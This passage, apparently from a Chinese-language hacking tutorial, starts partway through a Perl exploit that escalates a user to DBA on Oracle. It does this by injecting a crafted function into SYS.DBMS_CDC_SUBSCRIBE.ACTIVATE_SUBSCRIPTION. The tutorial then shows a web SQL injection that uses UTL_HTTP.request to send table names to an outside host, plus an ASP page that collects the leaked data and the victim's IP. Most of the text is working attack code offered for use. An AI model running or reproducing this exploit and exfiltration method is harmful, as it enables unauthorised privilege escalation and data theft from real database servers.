Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil function...\n";
$dbh->do( qq{
CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
RETURN(0);
END;
} );
print "[-] Go ...(don't worry about errors)!\n";
my $sth = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||''');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
-------
以上 的方法其實就是 首先自己要建立一個函數叫 OWN 裡面的操作就是
GRANT DBA TO $user 把DBA許可權授予某個使用者!
然後到有存在注入的預存程序中
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION( 放入OWN函數 );
因為
ACTIVATE_SUBSCRIPTION方法存在注射
所以會直接執行 own函數 去添加一個許可權
這裡示範的是 需要先建立一個函數的!但是我們WEB SQL INJ的時候不能寫多個SQL來建個函數啊!
有什麼方法?
ACTIVATE_SUBSCRIPTION存在注射 當然也可以把後面的語句屏蔽了!跟我們WEB SQL INJ差不多
具體怎麼知道應該怎樣檢測挖掘ORACLE的函數注入,下次我會寫篇<<檢測函數注入in ORACLE>>的文章
以上原理介紹完了 開始實戰!
記得 很多文章說要是SQL語句這樣子寫
sqlstr="begin select * from kj021320 where name=$name;end;";
可以執行多語句!其實這個是廢話!現在寫代碼的哪個會這樣~一般都直接操作SQL了
sqlstr="select * from kj021320 where name=$name";
所以在,ORACLE WEB中SQL注射只能使用函數,預存程序不能使用!具體為什麼自己去看看文檔
回到上面的注射一般都會返回false的!
沒關係其實有函數注射 許可權對我們來說不重要~
那現在怎麼確認ORACLE主機的位置呢? 也就是說他的IP跟WEB是不是同一個機器
那麼我們採用
UTL_HTTP 這個包裡面的 request函數
例子:
SELECT UTL_HTTP.request('http://www.isto.cn/getdata.asp?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1
他會把資料當作URL請求發送出去!具體大型資料庫都有遠端資料調用的方式 可以參看
ART OF WEB-SQL-INJECTION第1卷
那麼我們怎麼構造這個注射呢?很簡單!
http://127.0.0.1:8080/VOA/test.jsp?id=282 and '1'in(SELECT UTL_HTTP.request('http://www.isto.cn/getdata.asp?data='||TABLE_NAME) FROM USER_TABLES)
這樣子!
然而我們得構造一個頁面接收請求的參數!ASP簡單實現
<%
if request("data")="" then
response.Write Application("oracle_data")
else
dim dataValue
dataValue=request.ServerVariables("REMOTE_HOST") & " data : " & request("data") & "<br>"
if request("clear")<>"" then
Application("oracle_data")=dataValue
else
Application("oracle_data")=Application("oracle_data") & dataValue
end if
end if
%>
除非他資料庫是內網 不然一般我們都可以擷取他的IP地址以及資料~ 比猜表還快!